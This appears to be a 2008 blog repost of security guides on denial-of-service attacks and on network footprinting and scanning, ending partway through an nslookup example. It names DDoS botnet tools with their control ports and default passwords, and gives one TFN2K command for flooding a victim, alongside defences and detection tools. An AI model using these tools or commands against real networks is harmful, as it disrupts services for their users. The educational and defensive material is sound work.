DoS - HSC Guides - Ethical Hacker

Written by Ethical Hacker
Sunday, 17 February 2008 17:45

What's Denial of Service? There are the many questions that still lurk around. There are different types of Denial of Service attacks. There is DoS, DDoS and Zombie attack.


Protection against DOS is difficult due to the very nature of the attacks. Different scanning tools are available to aid detection and plugging of vulnerabilities leading to Denial of Service. Some famous attacks with Denial of service attacks were on; Yahoo Inc, Buy.com Inc, eBay, Amazon.com, CNN and Microsoft.com. Recently milliondollarhomepage.com of a UK student who had the idea of selling pixels as advertising space was hit by a DDoS attack. There are tons of attacks on smaller websites that go un-reported. Millions of money are lost due to lost revenues and unhappy customers.


A denial of service attack (DOS) is when an attacker can make a system unusable or significantly slow for legitimate users by overloading the resources, so that no one can access it. If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine by using denial of service attack. Do) is an attack designed to render a computer or network incapable of providing normal services. The most common DoS attacks will target the computer's network bandwidth or connectivity. Bandwidth attacks flood the network with such a high volume of traffic, that's all available network resources are consumed and legitimate user requests cannot get through. Connectivity attacks flood a computer with such a high volume of connection requests, that all available operating system resources are consumed and the computer can no longer process legitimate user requests. Not all service outages, even those that result from malicious activity, are necessarily denial-of-service attacks. Other types of attack may include a denial of service as a component, but the denial of service may be part of a larger attack. Illegitimate use of resources may also result in denial of service. For example, an intruder may use of an anonymous ftp area as a place to store illegal copies of commercial software, consuming disk space and generating network traffic. A denial of service attack can also destroy programming and files in a computer system. Although usually intentional and malicious, a denial of service attack can sometimes happen accidentally. A denial of service attack is a type of security breach to a computer system that does not usually result in the theft of information or other security loss.

A denial-of-service attack is characterized into four attack points:

1.(Flood) a network, thereby preventing legitimate network traffic.
2.(Disrupt) connections between two machines, thereby preventing access to a service.
3.(Prevent) a particular individual from accessing a service.
4.(Disrupt) service to a specific system or person.


[DoS Attack Classes]

There are three attack classes in Denial of Service attack.

Bandwidth attack: Bandwidth attacks are relatively straightforward attempts to consume resources, such as network bandwidth or equipment throughput. High-data-volume attacks can consume all available bandwidth between an ISP and your site. The link fills up, and legitimate traffic slows down. Timeouts may occur, causing retransmission, generating even more traffic. An attacker can consume bandwidth by transmitting any traffic at all on your network connection. A basic flood attack might use UDP or ICMP packets to simply consume all available bandwidth. For that matter, an attack could consist of TCP or raw IP packets, as long as the traffic is routed to your network.
A simple bandwidth-consumption attack can exploit the throughput limits of servers or network equipment by focusing on high packet rates times sending large numbers of small packets. High-packet-rate attacks typically overwhelm network equipment before the traffic reaches the limit of available bandwidth. Routers, servers, and firewalls all have constraints on input-output processing, interrupt processing, CPU, and memory resources. Network equipment that reads packet headers to properly route traffic becomes stressed handling the high packet rate (packets per second), not the volume of the data (Mbps). In practice, denial of service is often accomplished by high packet rates, not by just traffic volume.

Protocol attack: The basic flood attack can be further refined to take advantage of the inherent design of common network protocols. These attacks do not directly exploit weaknesses in TCP/IP stacks or network applications but, instead, use the expected behavior of protocols such as TCP, UDP, and ICMP to the attacker's advantage. Examples of protocol attacks include the following: SYN flood is an asymmetric resource starvation attack in which the attacker floods the victim with TCP SYN packets and the victim allocates resources to accept perceived incoming connections. As mentioned above, the proposed Host Identity Payload and Protocol (HIP) are designed to mitigate the effects of a SYN flood attack. Another technique, SYN Cookies, is implemented in some TCP/IP stacks.
Smurf is an asymmetric reflector attack that targets a vulnerable network broadcast address with ICMP ECHO REQUEST packets and spoofs the source of the victim. Fraggle is a variant of smurf that sends UDP packets to echo or chargen ports on broadcast addresses and spoofs the source of the victim.

Logic attack: Unlike flooding and protocol attacks, which seek to consume network or state resources, logic attacks exploit vulnerabilities in network software, such as a web server, or the underlying TCP/IP stack. Some vulnerability by crafting even a single malformed packet. There are many variations on these common types of attacks and many varieties of attack tools to implement them.
Denial-of-service attacks may be effective because of a combination of effects. For example, an attack that does not fully consume bandwidth or overload equipment throughput may be effective because it generates enough malformed traffic to crash a particular service, such as a web server or mail server.


[DDoS]

Distributed Denial of Service Attack is when an attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time. This makes it difficult to detect because attacks originate from several IP addresses. This attack is more dangerous because many IP's are participating in this attack. If a single IP address is attacking a website, it can block that address. If it is 50,000 this is extremely difficult. DDoS attacks involve breaking into hundreds or thousands of machines all over the Internet. Then the attacker installs DDoS software on them, allowing them to control all these burgled machines to launch coordinated attacks on victim sites. These attacks typically exhaust bandwidth, router processing capacity, or network stack resources, breaking network connectivity to the victims. DDoS is a combination of DoS attacks staged or carried out in concert from various hosts to penalize the target host from further serving its function. DDoS is term coined when the source of the attack is not coming from a single source, but multiple sources. DDoS cannot be eliminated with merely filtering the source IPs since it is often launched from multiple points installed with agents. Some known DDoS tools are Mstream, Trinoo, TFN2K (Tribe Flood Network), Stacheldraht and Shaft. DDoS attack is an example of a bandwidth attack. A Distributed Denial of Service (DDoS) attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server technology, the perpetrator is able to multiply the effectiveness of the Denial of Service significantly by harnessing the resources of multiple unwitting accomplice computers, which serve as attack platforms. Typically, a DDoS master program is installed on one computer using a stolen account. The master program, at a designated time, then communicates to any number of "agent" programs, installed on computers anywhere on the Internet. The agents, when they receive the command, initiate the attack. Using client/server technology, the master program can initiate hundreds or even thousands of agent programs within seconds.


[DoS Tools]

There are many denial of service (DoS) Tools/Methods that are available to download. Many are not effective since security became stronger and holes were patched but I will discuss some of the most popular tools still that work. Some of the popular Tools/Methods are: Ping of Death (Affects Win 95/NT), wwwHack (Affects web Servers), SSPing (Affects Win 95/NT and Mac OS), Land Exploit (Affects Win 95/NT), Smurf (Affects Networks), SYN Flood (Affects Web Servers/Most OS), WinNuke (Affects Win 95/NT)(Nukers), Jolt2 (Affects Win NT/2000), Bubonic.c (Affects Win 2000/Some Linux versions), Targa (Affects Linux and BSD Unix). Customized php scripts and executables that are coded to attack web sites/web servers.


[SYN Flood]

SYN attack floods a targeted system with a series of SYN packets. Each packet causes the targeted system to issue a SYN-ACK response, while the targeted system waits for the ACK that follows the SYN-ACK; it queues up all outstanding SYN-ACK responses on what is known as a backlog queue. SYN-ACKs are moved of the queue only when an ACK comes back or when an internal timer (which is set at relatively long intervals) terminates the TCP three-way handshake. Once the queue is full, the system will ignore all incoming SYN requests, making the system unavailable for legitimate users. The connectionless TCP attack does not complete the three-way handshake initiated by the originator. Thus, often the packet is crafted with nonexistent (spoofed) source IP. For a connectionless TCP attack, it is more difficult to filter since the source address is not necessarily the original source IP of the packet. When the host fails to find the source IP, it will wait until it times out. The most effective way of stopping such attacks is by applying rate limit. Rate limit is a method of setting threshold to an acceptable number of packets to be processed by the computer. One of the most common attacks that will appear on many Intruder Detection System alerts is TCP SYN flood alerts. TCP SYN flood attacks are instigated by crafting packets from spoofed or non-existent source address and generating a high number of half-open connections. Because each connection opened must be processed to its completion (to complete the handshake or eventual timeout), the system is pinned down to perform these tasks. This problem is inherent in any network or operating system running full-fledged TCP/IP design and something that is not easily rectified.

Some countermeasure would be like network Ingress filtering can also prevent their downstream networks from injecting packets with faked or "spoofed" addressed into the Internet. Although it may not stop the attack, it will make identifying the source host easier and terminate it immediately. RFC 2267 provides more information on Ingress Filtering.

In the TCP/IP protocol, a three-way handshake takes place as a service is connected to. First in a SYN packet from the client, with which the service responses with a SYN-ACK. Finally, the client responds to the SYN-ACK and the conversation is considered started. A SYN Flood attack is when the client does not response to the SYN-ACK, tying up the service until the service times out, and continues to send SYN packets. The source address of the client is forged to a non-existent host, and as long as the SYN packets are sent faster than the timeout rate of the TCP stack waiting for the time out, the resources of the service will be tied up. This is a simplified version of what exactly happens. During a SYN flood attack, the attacker sends a large number of SYN packets alone, without the corresponding ACK packet response to the victim's SYN/ACK packets. The victim's connections table rapidly fills with incomplete connections, crowding out the legitimate traffic. Because the rate of attacking SYN packets usually far exceeds that of normal traffic, even when a table entry eventually is cleared out, another attacking SYN packet rather than a legitimate connection will fill it. But because SYN packets are a necessary part of legitimate traffic, they cannot be filtered out altogether. Second, SYN packets are relatively small, so an attacker can send large numbers of packets using relatively low-bandwidth Internet connections. Finally, because the attacker does not need to receive any data from the victim, the attacker can place random source IP addresses in the attacking packets to camouflage the actual source of the attack, and make filtering all but impossible. The basic purpose of a SYN flood is to use up all new network connections at a site and thus prevent legal users from being able to connect. TCP connections are made by first sending a request to connect with an ID in it. The receiving connection sends out an acknowledgment saying it's ready and then the sending system is supposed to send an acknowledgment that the connection has been made. The SYN (Synchronize sequence Number) packet is the first of these and contains the ID the receiver is supposed to reply to. If a fake ID is in that packet then the receiving system never gets a connection acknowledgment. Eventually, the connection will time out and that incoming channel on the receiver will become available again for another request. A SYN flood sends so many such requests that all incoming connections be continuously tied up waiting for acknowledgments that never come. This makes the server generally unavailable to legal users (unless one happens to sneak in just at the moment one of the tied-up connections times out).


[DoS Security]

You could do the following things to minimize the DoS attack: Effective robust design, Bandwidth limitations, Keep systems patched, Run the least amount of services, Allow only necessary traffic and Block IP addresses. Due to the power of DoS attacks and the way they work, there is nothing that can be done to prevent a Dos attack entirely. The DoS and DDoS attacks in combination with malicious codes implantations are easily launched but difficult to completely stop. With the nature of TCP/IP and programming issues that are often overlooked, the current Internet is still vulnerable to various forms of DoS and DDoS attacks. There is no "silver bullet" solution to this, like many other security issues. Timely application of patches and system updates, especially to potentially exposed machines. For example, update and maintain a current build of BIND on DNS servers. Deployment of only strictly necessary network services, Intrusion detection systems, Firewalls, Anti-virus software and Good password policies. Use of Tripwire or other similar tools to detect changes in configuration information or other important files. Establishment and maintenance of regular backup schedules and policies. As a network is only as secure as its weakest link, protection of mobile and remote machines with personal firewall/intrusion detection software. However, in mitigating DoS or DDoS attacks, it requires good network design to be able to control the point of entry or the gateway. As for mitigating new attacks, it is essential to have filtering capability based on packet header and content within the network or at the critical gateways in order to filter malicious traffic as a response to such attacks while waiting for a permanent solution from suppliers to be applied to the devices. Applying all known patches and fixes to all devices in the network to prevent known attacks is necessary. Finally, it is important to have the relevant referrals in the policy and legislations to address the issue of DoS and DDoS to ensure an effective cooperation between service providers and law enforcement agencies.


[DDoS Tools]

The main and popular tools for running DDOS attacks are: Trinoo, TFN, Stacheldraht, Shaft, TFN2K and mstream.

(Trinoo)

UDP packet flood attack

No source address forgery

Some bugs, but full control features


(TFN)

Some bugs, limited control features

UDP packet flood attack ("trinoo emulation")

TCP SYN flood attack

ICMP Echo flood attack

Smurf attack

Either randomizes all 32 bits of IP source address, or just the last 8 bits


(TFN2K)

Same attacks as TFN, but can randomly do them all at once

Encryption added to improve security of the DDoS network

Control traffic uses UDP/TCP/ICMP

Same source address forgery features as TFN


(Stacheldraht/StacheldrahtV4)

Some bugs, full control features

Same basic attacks as TFN

Same source address forgery features as TFN/TFN2K


(Stacheldraht v2.666)

Fewer bugs than original

Same basic attacks as Stacheldraht

Adds TCP ACK flood attack

Adds TCP NUL (no flags) flood attack

Adds Smurf attack with pre-compiled list of 16,702 amplifiers

Same source address forgery features as stacheldraht/TFN/TFN2K


(shaft)

Some bugs, but full control features

Adds statistics

UDP flood attack

TCP SYN flood attack

ICMP flood attack

Randomize all three attacks


(mstream)

Many bugs, with very limited control features

TCP ACK flood (very efficient)

Randomizes all 32 bits of IP address


[DDOS - Attack Sequence]

All of the DDOS tools follow this sequence.

Mass-intrusion Phase - automated tools identify potential systems with weaknesses; then root compromise them and install the DDOS software on them. These are the primary victims.

DDOS Attack Phase - The compromised systems are used to run massive DOS against a victim site.

There is an initial mass-intrusion phase, in which automated tools are used to remotely root compromise large numbers (i.e., in the several hundred to several thousand ranges) and the distributed denial of service agents are installed on these compromised systems. These are primary victims (of system compromise.) None of these distributed denials of service tools has any features that facilitate compromising systems, and those groups who wrote them hold these automated tools closely. The mass-intrusion phase is followed by the actual denial of service attack phase, in which these compromised systems which constitute the handlers and agents of the distributed attack network are used to wage massive denial of service attacks against one or more sites. These are secondary victims (of denial of service).

[Trinno]

Trinoo was the first DDOS tool to be discovered. Found in the wild (binary form) on Solaris 2.x systems compromised by buffer overrun bug in RPC services: statd, cmsd, ttdbserverd. Trinoo daemons were UDP based, password protected remote command shells running on compromised systems. Trinoo is a DDOS attack tool. It uses the following TCP Ports:

Attacker to master: 27665/tcp
Master to daemon: 27444/udp
Daemon to master: 31335/udp

Daemons reside on the systems that launch that the attack and masters control the daemon systems. Since Trinoo uses TCP, it can be easily detected and disabled. The trinoo distributed denial-of-service system consists of 3 parts:

The Client: The client is not part of the trinoo package. The telnet or Netcat program is used to connect to port 27665 of the "master." An attacker connects to a master to control the "broadcasts" that will flood a target. (The master and broadcast are described later in this section.)

The Master: The master is contained in the file master.c in the trinoo package. While running, it waits for UDP packets going to port 31335. These packets are registration packets from the "broadcast." It also waits for connections to TCP port 27665. When a client connects to port 27665, the master expects the password to be sent before it returns any data. The default password is "betaalmostdone". When the master is run, it displays a "?" prompt, waiting for a password. The password is "gOrave".

The Broadcast (or Beast): The broadcast is the code in trinoo that performs the actual flooding. It is ns.c in the trinoo package. When the broadcast is compiled, the IP addresses of the masters that can control it are hard coded into the program. Starting the broadcast, a UDP packet is sent to port 31335 of each master IP, containing the data "*HELLO*". This packet registers the broadcast with the master. An attacker can then connect to the master and use the daemons to send a UDP flood.

There are six commands that a client can send to the master to cause the master to communicate with the broadcast. A master sending commands to a broadcast sends a UDP packet to port 27444 of the broadcast. The default password between the master and the broadcast daemon is "l44adsl". These are the six commands the client sends to the master:

- - mtimer:

Sets a timer to DoS a target. The master sends a "bbb" command to the broadcast. This packet looks like: "bbb l44adsl 300" when observed on the network.

- - dos:

Performs a Denial of Service attack on a machine. The attack used is explained below. The dos command sends an "aaa" command to the broadcast. This packet looks like: "aaa l44adsl 10.1.1.1" when observed on the network.

- - mdie:

Kills all broadcasts. An attacker cannot use this command when connected to the master unless an additional password is known (the password is unknown as of this writing), but an attacker can send their own UDP packet with the master-broadcast password ("l44adsl") to kill each of the broadcasts. The master then sends a "d1e" command to the broadcast daemon. This packet looks like: "d1e l44adsl" when observed on the network.

- - mping:

Pings all broadcasts. The master sends a "png" command to each broadcast, and the broadcast returns with a "PONG" packet sent to UDP port 31335 of the master. When this packet is transmitted from the master to the broadcast daemon, it looks like: "png 144 adsl".

- - mdos:

This command performs a Denial of Service attack on a list of machines. The master sends a "xyz" command to each broadcast. The packet looks like "xyz l44adsl 123:10.1.1.1:10.1.1.2:10.1.1.3:Ô

- - msize:

This command sets the size of the UDP packets to use when performing a Denial of Service attack on a target. It is undocumented in the master's online help system. The master sends a "rsz" command to the broadcast daemon, and the packet looks like "rsz l44adsl 300".

The DoS attack that trinoo broadcasts use is a UDP flood. Trinoo sends a large number of UDP packets containing 4 data bytes (all zeros) and coming from one source port to random destination ports on the target host. The target host returns ICMP Port Unreachable messages. The target host slows down because it is busy processing the UDP packets, and at this point, there will be little or no network bandwidth left. There is no reliable way to tell the difference between a trinoo flood and a UDP port scan, because it is not possible to determine if someone is monitoring the ICMP messages.


[TFN]

Could be thought of as son of trinoo

Improved on some of the weaknesses of trinoo by adding different types of attacks that could be mounted against the victim site. Structured like trinoo with attackers, clients (masters) and daemons. Initial system compromise allows the TFN programs to be installed.
Tribe Flood Network, like trinoo, uses a master program to communicate with attack agents located across multiple networks. TFN launches coordinated Denial of Service Attacks that are especially difficult to counter as it can generate multiple types of attacks and it can generate packets with spoofed source IP addresses. Some of the attacks that can be launched by TFN include UDP flood, TCP SYN flood, ICMP echo request flood, and ICMP directed broadcast. The basic characteristics of and suggested defense strategies against the TFN DDoS attack follow. To initiate TFN, the attacker accesses the master program and sends it the IP address of one or more targets. The master program proceeds to communicate with all of the agent programs, instructing them to initiate the attack. Communications between TFN master programs and agent programs use ICMP echo reply packets, where the actual instruction to be carried out is embedded in the 16-bit ID field in binary format. The use of ICMP (Internet Control Message Protocol) makes packet protocol filtering possible. TFN agents can be defeated by configuring your router or intrusion detection system to disallow all ICMP echo and echo reply packets onto your network. However, this will break all internet programs (such as "ping") that utilize these functions. The TFN master program reads a list of IP addresses containing the locations of the agents programs. This list of addresses may be encrypted, using "Blowfish" encryption. If it is not encrypted, then the agents can be identified from the list.

[TFN2K]


TFN2K is a DDOS program which runs in distributed mode. There are two parts to the program: client and server.

The server (also known as zombies) runs on a machine in listening mode and waits for commands from the client.

Running the server
#td
Running the client
#tn -h 23.4.56.4 -c8 -i 56.3.4.5

This command starts an attack from 23.4.56.4 to the victim's computer 56.3.4.5

The TFN2K distributed denial of service system consists of client/server architecture. The Client: The client is used to connect to master servers, which can then perform specified attacks against one or more victim machines. Commands are sent from the client to the master server within the data fields of ICMP, UDP, and TCP packets. The data fields are encrypted using the CAST algorithm and base64 encoded.

The client can specify the use of random TCP/UDP port numbers and source IP addresses. The system can also send out "decoy" packets to non-target machines. These factors make TFN2K more difficult to detect than the original TFN program.

The Master Server: The master server parses all UDP, TCP, and ICMP echo reply packets for encrypted commands. The master server does not use a default password when it is selected by the user at compile time.

The Attack: The TFN2K client can be used to send various commands to the master for execution, including commands to flood a target machine or set of target machines within a specified address range. The client can send commands using UDP, SYN, ICMP echo, and ICMP broadcast packets. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth. TFN2K can also be used to execute remote commands on the master server and bind shells to a specified TCP port. TFN2K runs on Linux, Solaris, and Windows platforms.


[Stacheldraht]

Stacheldraht combines the features of TFN and Trinoo but adds encryption layer between daemons. Stacheldraht uses TCP and ICMP on the following ports:
Client to Handler: 16660 TCP

Handler to and from agents: 65000 ICMP

Stacheldraht consists of three parts: the master server, client, and agent programs.

The Client:

The client is used to connect to the master server on port 16660 or port 60001. Packet contents are blowfish encrypted using the default password "sicken", which can be changed by editing the Stacheldraht source code. After entering the password, an attacker can use the client to manage Stacheldraht agents, IP addresses of attack victims, lists of master servers, and to perform DoS attacks against specified machines.

The Master Server: The master server handles all communication between client and agent programs. It listens for connections from the client on port 16660 or 60001. When a client connects to the master, the master waits for the password before returning information about agent programs to the client and processing commands from the client.

The Agent: The agent listens for commands from master servers on port 65000. In addition to this port, master server/agent communications are also managed using ICMP echo reply packets. These packets are transmitted and replied to periodically. They contain specific values in the ID field (such as 666, 667, 668, and 669) and corresponding plaintext strings in the data fields (including "skillz", "ficken", and "spoofworks"). The ICMP packets act as a "heartbeat" between agent and master server, and to determine source IP spoofing capabilities of the master server. The agent identifies master servers using an internal address list, and an external encrypted file containing master server IP addresses. Agents can be directed to "upgrade" themselves by downloading a fresh copy of the agent program and deleting the old image as well as accepting commands to execute flood attacks against target machines.

The Attack: Like TFN/TFN2K, Stacheldraht can be used to perform ICMP, SYN, and UDP flood attacks. The attacks can run for a specified duration, and SYN floods can be directed to a set of specified ports. These flood attacks cause the target machine to slow down because of the processing required to handle the incoming packets, leaving little or no network bandwidth.

Stacheldraht combines features of the "trinoo" distributed denial of service tool, with those of the original TFN, and adds encryption of communication between the attacker and stacheldraht masters and automated update of the agents. One of the weaknesses of TFN was that the attacker's connection to the master(s) that control the network was in clear-text form, and was subject to standard TCP attacks (session hijacking, RST sniping, etc.) Stacheldraht deals with this by adding an encrypting "telnet alike" (stacheldraht term) client. The attacker(s) control one or more handlers using encrypting clients. Each handler can control many agents (up to 1000 agents). The agents are all instructed to coordinate a packet-based attack against one or more victim systems by the handler.Unlike trinoo, which uses UDP for communication between handlers and agents, or the original Tribe Flood Network, which uses ICMP for communication between the handler and agents, stacheldraht uses TCP and ICMP. Client to handler(s): 16660/tcp and Handler to/from agent(s): 65000/tcp, ICMP_ECHOREPLY. Remote control of a stacheldraht network is accomplished using a simple client that uses symmetric key encryption for communication between itself and the handler. After connecting to the handler using the client program, the attacker is prompted for a password. This password (default "sicken") is a standard crypt() encrypted password, which is then Blowfish encrypted using the pass phrase "authentication" before being sent over the network to the handler. One feature of stacheldraht not shared by trinoo or TFN is the ability to upgrade the agents on demand. This feature employs the Berkeley "rcp" command (514/tcp), using a stolen account at some site as a cache.


[DDoS Security]

Keep the network secure, Install IDS (Intrusion Detection System), Use scanning tools and Run zombie tools. IDS pattern matching technologies have a database of signatures. When it finds packets that have a given pattern, it sets off an alarm. Important things to do as a current or potential victim of packet flooding Denial of Service are given below:

The bandwidth used in DDoS attacks is important. Therefore, there should be proper coordination with the ISP and the ISP with the upstream providers. To prevent SYN flooding attacks, set up the TCP interception feature. Details about this can be found at http://www.cisco.com. Block the UDP and ICMP messages that are not required by the network. Especially permitting outgoing ICMP unreachable messages could multiply the impact of a packet flooding attack. Deny all traffic that is not explicitly needed for the servers run. Adopt multi-homing as a best practice.

[IDS systems]

Some best IDS systems are; Shareware, Snort, Shadow, Courtney, Commercial, ISS RealSecure, Axent NetProwler, Cisco Secure ID (Net Ranger),
Network Flight Recorder and Network Security Wizards Dragon.

An Intrusion Detection System (abbreviated as IDS) is a defense system, which detects hostile activities in a network. The key is then to detect and possibly prevent activities that may compromise system security, or a hacking attempt in progress including reconnaissance/data collection phases that involve for example, port scans.

One key feature of intrusion detection systems is their ability to provide a view of unusual activity and issue alerts notifying administrators and/or block a suspected connection. nce an intrusion has been detected, IDS issues alerts notifying administrators of this fact.

Issue 1: Amount of bandwidth exceeds a maximum threshold that is expected normal traffic for a site could cause.

Issue 2: Oversized ICMP and UDP packets. Stateful UDP sessions are normally using small UDP packets, having a payload of not more than 10 bytes. Normal ICMP messages dont exceed 64 to 128 bytes. poofed in control traffic.

Issue 3: TCP packets (and UDP packets) that are not part of a connection. The stealthiest DDOS tools use random protocols, including connection-oriented protocols, to send data over non-connection-oriented channels.

Issue 4: Packet payload contains ONLY alphanumeric character and no spaces, punctuation, control characters). This can be a sign that the packet payload is BASE64-encoded, and therefore contains only base64 characters.

Issue 5: Packet payload contains ONLY binary, high-bit characters. While this can be a binary file transfer traffic transmitted over ports 20, 21, 80, etc. must be excluded if this rule is applied.



[Find_DDoS]

The tool find_ddos is intended to scan a local system that is either known or suspected to contain a DDOS program. It is capable of scanning executing processes on Solaris 2.6 or later, and of scanning local files on a Solaris 2.x or later system. The tool will detect several known denial-of-service attack tools by looking at all 32-bit ELF format files in a given directory tree, and comparing the files' strings and symbol table against a set of known "fingerprints" for TFN and trinoo tools.

The tool also looks for files named ".sr", "...", "mservers", and optionally makes a copy of them for later analysis. (These are common names for files that contain a list of blowfish-encrypted IP addresses. The blowfish encryption key can be found by examining the binary.)

The distributed denial-of-service tools that are detected by the tool are: mstream master, mstream server, stacheldraht client, stacheldraht daemon,
stacheldraht master, tfn-rush client, tfn client,
tfn daemon, tfn2k client, tfn2k daemon, trinoo daemon, trinoo master

The tool must be run as root. The syntax of the tool is:

./find_ddos [-g grabdir] [-1 logfile] [-p] [-v] [-V] [-x exclude1] [scandir]

[DDoSPing]

This is a tool that explores another system and looks for vulnerabilities. DDoSPing is a remote network scanner for the most common DDoS programs. It can detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings, although configuration of each program type is possible from the tool's configuration screen. Scanning is performed by sending the appropriate UDP and ICMP messages at a controllable rate to a user-defined range of addresses.


[Zombie Zapper]

Zombie Zapper works against Trinoo, TFN, Stacheldraht, Troj_Trinoo (Windows port of Trinoo), and Shaft. Assuming that the default passwords have not been changed, the user can simply use the same commands that an attacker would use to stop the flood. On Trinoo and Troj_Trinoo, it does stop the daemon entirely (although Trinoo is typically set to be restarted by cron, and Troj_Trinoo will restart after the Zombie Windows computer has been restarted), but on TFN, Stacheldraht, and Shaft the flooding just stops.


Denial of Service is a very common way of attacks these days. Knowing how to secure your site and networks will greatly reduce the chances of an attack. There are different tools available for attackers to launch DOS attacks. Protection against DOS is difficult due to the very nature of the attacks. Different scanning tools are available to aid detection and plugging of vulnerabilities. I hope this article was educational for you and thought you a great deal in Denial of service security. The care and diligence used to design and implement networks, software, and operating systems has a great effect on the ability of the attacker to cause denial of service. Prevention and awareness are two factors that have an immediate impact on the success of these attacks. Filtering of unnecessary services and network data, stronger authentication and access control of remote systems and users, and proactive monitoring and updating of systems and software can help protect your network against these attacks.
Sumber : http://www.hackerscenter.com

Read More..

Scanning - HSC Guides - Ethical Hacker

Written by Ethical Hacker
Sunday, 17 February 2008 17:30

Footprinting and Scanning is the first basis of hacking. Information gathering has many phases like profiling your target. Whois, ARIN can reveal public information of a domain that can be leveraged further. Traceroute and mail tracking can be used to target specific IP and later for spoofing. Nslookup can reveal specific users and zone transfers can compromise DNS security. Footprinting is necessary to systematically and methodically ensure that all pieces of information related to the aforementioned technologies are identified.

Without a sound methodology for performing this type of reconnaissance, you are likely to miss key pieces of information related to a specific technology or organization. Footprinting is often the most arduous task of trying to determine the security posture of an entity; however, it is one of the most important.
Footprinting must be performed accurately and in a controlled fashion. This is the reconnaissance step before anything is done. Tools like Nmap will be deployed to scan the target and get any available information possible. Information warfare is not without its battle plans or surveillance techniques. In this context, a strategic map used in a battle would be a close analogy to a footprint.

Note that through this course, we use the term 'organization' to represent a target system. This includes discussion pertaining to a single system as well. Footprinting therefore, needs to be carried out precisely and in an organized manner. The information unveiled at various network levels can include details of domain name, network blocks, network services and applications, system architecture, intrusion detection systems, specific IP addresses, access control mechanisms and related lists, phone numbers, contact addresses, authentication mechanisms and system enumeration. This listing may include more information depending on how various security aspects are addressed by the organization.

Information gathered during the Footprinting phase can be used as a springboard in narrowing down the attack methodology and also in assessing its merit. One dubious aspect of the information gathering phase is that most of it can be sought within legal bindings and from publicly available information. It is to be noted that though the Internet originated from the efforts of the defense department and many of the protocols were established to serve the purpose of communicating information reliably, completely and dependably; the speed with which it would penetrate the common world was unpredicted, and so were the security concerns that would arise from the increased networked environment.

One of the best Hack Tool to gather information is Google! Google Hacking if most popular among Ethical Hackers and Black Hat Hackers. When using scanning tools the purpose is to detect 'live' systems on target network. Discovering services running/ listening on target systems. Understanding port scanning techniques. Identifying TCP and UDP services running on target network.
Discovering the operating system. Understanding active and passive fingerprinting. Automated discovery tools.
There are various scan types - SYN, FIN, Connect, ACK, RPC, Inverse Mapping, FTP Bounce, Idle Host etc. The use of a particular scan type depends on the objective at hand. Port Scanning is one of the most popular reconnaissance techniques used by hackers to discover services that can be compromised.
A potential target computer runs many 'services' that listen at 'well-known' 'ports'. By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited. Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans. One of the primary activities that an attacker undertakes while attempting to penetrate the system is to compile an inventory of open ports using any of the port scanning techniques. On completion, this list helps the attacker identify various services that are running on the target system using a RFC compliant port list (discussed before under the services file). This allows further strategizing leading to system compromise. Port numbers are 16-bit unsigned numbers and can be broadly classified into three categories. Port 0-1023 is "well known ports", 1024 - 49151 are "registered ports" and 49152 - 65535 is "dynamic or private ports". Port scanning usually means scanning for TCP ports, which being a stateful protocol - based on acknowledgement, gives good feedback to the attacker. One problem with port scanning is that it is effortlessly logged by the services listening at the scanned ports.
This is because they detect an incoming connection, but do not receive any data, thereby generating an application error log. UDP, or connection-less (without acknowledgement) traffic, responds in a different manner. In order to scan for UDP ports, the attacker generally sends empty UDP datagram at the port. If the port is listening, the service will send back an error message or ignore the incoming datagram. If the port is closed, then the operating system sends back an "ICM P Port Unreachable" message. Here, by the method of exclusion, the attacker can find open ports.
Usually UDP ports are high end ports. Port scanning techniques can be broadly differentiated into open scan, half-open scan and stealth scan. There are other techniques such as ICMP echo and FTP bounce, and these are covered under sweeps and miscellaneous scans. How does an attacker decide on which scan to adopt? Well, this depends largely on the knowledge gained by the attacker during his reconnaissance regarding the type of network topology, IDS and other logging features present on the system. Predictably, an attacker would like to keep his actions undetected. One important aspect of information gathering is documentation. Most people don't like paperwork, but it's a requirement that can't be ignored. The best way to get off to a good start is to develop a systematic method to profile a target and record the results. Create a matrix with fields to record domain name, IP address, DNS servers, employee information, email addresses, IP address range, open ports, and banner details.

[Whois]

The primary tool to navigate these databases is Whois. Whois is a utility that interrogates the Internet domain name administration system and returns the domain ownership, address, location, phone number, and other details about a specified domain name. Whois is the primary tool used to query Domain Name Services (DNS). If you're performing this information gathering from a Linux computer, the good news is Whois is built in. From the Linux prompt, users can type in whois domainname.com or whois? to get a list of various options.

Windows users are not as fortunate as Linux users because Windows does not have a built-in Whois client. Windows users will have to use a third-party tool or website to obtain Whois information. One tool that a Windows user can use to perform Whois lookups is Sam Spade. There's also a variety of websites that you can use to obtain Whois information.


A Domain proxy is one way that organizations can protect their identity while still complying with laws that require domain ownership to be public information. Domain proxies work by applying anonymous contact information as well an anonymous email address. This information is displayed when someone performs a domain Whois.

The proxy then forwards any emails or contact information that might come to those addresses on to you. This information provides a contact person, address, phone number, and DNS servers. A hacker skilled in the art of social engineering might use this information to call the organization and pretend to be Kenneth, or he might use the phone number to war dial a range of phone numbers looking for modems.



[DNS Enumeration]

The attacker has also identified the names of the DNS servers. DNS servers might be targeted for zone transfers. A zone transfer is the mechanism used by DNS servers to update each other by transferring the contents of their database. DNS is structured as a hierarchy so that when you request DNS information, your request is passed up the hierarchy until a DNS server is found that can resolve the domain name request.
What's left at this step is to try and gather additional information from the organization's DNS servers. The primary tool to query DNS servers is nslookup. Nslookup provides machine name and address information. Both Linux and Windows have nslookup clients. Nslookup is used by typing nslookup from the command line followed by an IP address or a machine name. Doing so will cause nslookup to return the name, all known IP addresses, and all known CNAMES for the identified machine. Nslookup queries DNS servers for machine name and address information.
Using nslookup is rather straightforward. Let's look at an example in which nslookup is used to find out the IP addresses of Google's web servers. By entering nslookup www.google.com, the following response is obtained:

C:\>nslookup www.google.com
Server: dnsr1.sbcglobal.net
Address: 68.94.156.1
Non-authoritative answer:
Name: www.l.google.com
Addresses: 64.233.187.99, 64.233.187.104
Aliases: www.google.com


